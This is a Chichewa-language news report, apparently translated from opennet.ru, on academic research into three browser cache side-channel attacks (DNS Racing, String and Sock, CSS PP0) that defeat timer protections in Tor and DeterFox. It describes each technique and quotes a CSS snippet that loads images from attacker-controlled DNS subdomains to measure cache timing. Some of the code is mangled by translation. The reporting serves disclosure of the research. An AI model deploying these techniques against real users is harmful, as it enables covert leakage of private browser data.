Gulu la ofufuza ochokera ku mayunivesite angapo aku America, Israeli ndi Australia apanga ziwopsezo zitatu zomwe zimayendera pamasamba kuti apeze zambiri za zomwe zili mu processor cache. Njira imodzi imagwira ntchito m'masakatuli opanda JavaScript, ndipo zina ziwirizo zimalambalala njira zomwe zilipo kale zodzitchinjiriza motsutsana ndi njira zam'mbali, kuphatikiza zomwe zimagwiritsidwa ntchito mu msakatuli wa Tor ndi DeterFox. Khodi yowonetsera kuwukira, komanso magawo a seva ofunikira pakuwukira, amasindikizidwa pa GitHub.
Kuti muwunike zomwe zili mu cache, ziwopsezo zonse zimagwiritsa ntchito njira ya Prime + Probe, yomwe imaphatikizapo kudzaza chosungiracho ndi mikhalidwe yokhazikika ndikuzindikira zosintha poyesa nthawi yofikira pakuzidzazanso. Kudumpha njira zachitetezo zomwe zili mu asakatuli zomwe zimasokoneza kuyeza kolondola kwa nthawi, muzosankha ziwiri, pempho limaperekedwa ku seva ya DNS kapena WebSocket yomwe imayendetsedwa ndi wowukirayo, yomwe imasunga nthawi ya zopempha zomwe zalandilidwa. Mwachidziwitso chimodzi, nthawi yokhazikika ya DNS imagwiritsidwa ntchito ngati nthawi.
Miyezo yopangidwa pogwiritsa ntchito ma seva akunja a DNS kapena WebSocket, pogwiritsa ntchito kachitidwe kamagulu potengera kuphunzira pamakina, inali yokwanira kulosera zamtengo wapatali mpaka 98% muzochitika zabwino kwambiri (avareji 80-90%). Njira zowukirazi zayesedwa pamapulatifomu osiyanasiyana a hardware (Intel, AMD Ryzen, Apple M1, Samsung Exynos) ndipo zatsimikiziridwa kuti ndi zapadziko lonse lapansi.
Mtundu woyamba wa DNS Racing attack umagwiritsa ntchito njira ya Prime+Probe pogwiritsa ntchito ma JavaScript arrays. Kusiyanaku kumayambira pakugwiritsa ntchito nthawi yakunja yochokera ku DNS ndi chowongolera cha onerror, chomwe chimayambika pamene kuyesa kupangidwa kukweza chithunzi kuchokera kumalo komwe kulibe. Chowerengera chakunja chimalola kuukira kwa Prime+Probe pa asakatuli omwe amachepetsa kapena kuletsa kulowa kwa zowerengera za JavaScript.
Kwa seva ya DNS yomwe ili pa netiweki yomweyo ya Efaneti, kulondola kwa timer kumayerekezedwa kukhala pafupifupi 2 ms, yomwe ndi yokwanira kuchitapo kanthu panjira (poyerekeza, kulondola kwa nthawi ya JavaScript mu Tor Browser ndi. kutsika mpaka 100 ms). Pachiwopsezo, kuwongolera seva ya DNS sikofunikira, chifukwa nthawi yochitira ntchitoyo imasankhidwa kuti nthawi yoyankha kuchokera ku DNS ikhale ngati chizindikiro chakumalizidwa koyambirira kwa cheke (kutengera ngati wogwiritsa ntchitoyo adayambitsa. m'mbuyomu kapena pambuyo pake, mawu omaliza amaperekedwa pa liwiro la cheke ndi posungira) .
Njira yachiwiri yowukira, "String and Sock", ikufuna kudutsa njira zachitetezo zomwe zimaletsa kugwiritsa ntchito magawo otsika mu JavaScript. M'malo mwamagulu, String ndi Sock amagwiritsa ntchito zingwe zazikulu kwambiri, kukula kwake komwe kumasankhidwa kuti kusinthaku kumakwirira cache yonse ya LLC (Cache yomaliza). Kenaka, pogwiritsa ntchito indexOf () ntchito, chingwe chaching'ono chimafufuzidwa mu chingwe, chomwe poyamba sichipezeka mu chingwe choyambira, i.e. kusaka kumabweretsa kubwereza kwa chingwe chonse. Popeza kukula kwa mzere kumafanana ndi kukula kwa cache ya LLC, kusanthula kumakupatsani mwayi wofufuza posungira popanda kuwongolera masanjidwewo. Kuti muyese kuchedwa, m'malo mwa DNS, kuyitana kumapangidwa ku seva ya WebSocket yoyendetsedwa ndi wowukirayo - ntchito yofufuzira isanayambe komanso itatha, mafunso amatumizidwa pamzere, kutengera momwe seva imawerengera kuchedwa komwe kumagwiritsidwa ntchito kusanthula cache. zamkati.
Mtundu wachitatu wa kuukira kwa "CSS PP0" umakhazikitsidwa kudzera mu HTML ndi CSS, ndipo utha kugwira ntchito m'masakatuli omwe JavaScript yayimitsidwa. Njirayi ndi yofanana ndi "String ndi Sock", koma siimangiriridwa ku JavaScript. Pakuukira, gulu la osankhidwa a CSS amapangidwa omwe amasaka ndi chigoba. Chingwe chachikulu choyambirira chomwe chimadzaza chosungiracho chimayikidwa popanga div tag yokhala ndi dzina lalikulu kwambiri. Mkati mwake muli ma div ena omwe ali ndi zizindikiritso zawo. Iliyonse mwa ma divs okhala ndi zisa ili ndi mawonekedwe ake omwe ali ndi chosankha chomwe chimafufuza kachingwe kakang'ono. Popereka tsamba, msakatuli amayesa kaye ma divs amkati, zomwe zimabweretsa ntchito yosaka pamzere waukulu. Kusakaku kumachitika pogwiritsa ntchito chigoba chosowa mwadala ndipo kumabweretsa kubwereza mzere wonsewo, pambuyo pake "osati" amayambika ndikuyesa kuyika chithunzi chakumbuyo cholozera madera osasinthika: #pp: not([ class*='xjtoxg']) # s0 {chithunzi chakumbuyo: url("https://qdlvibmr.helldomain.oy.ne.ro");} #pp:not([class*='gzstxf']) # s1 {chithunzi chakumbuyo: url(" https://licfsdju.helldomain.oy.ne.ro");} ... X X ...
Ma subdomain amathandizidwa ndi seva ya DNS yowukira, yomwe imatha kuyeza kuchedwa pakulandila zopempha. Seva ya DNS imatulutsa NXDOMAIN pazofunsira zonse ndikusunga nthawi yeniyeni yofunsira. Chifukwa cha kukonza ma divs, seva ya DNS yowukirayo imalandira zopempha zingapo, kuchedwa komwe kumayenderana ndi zotsatira zowunika zomwe zili mkati.
Source: opennet.ru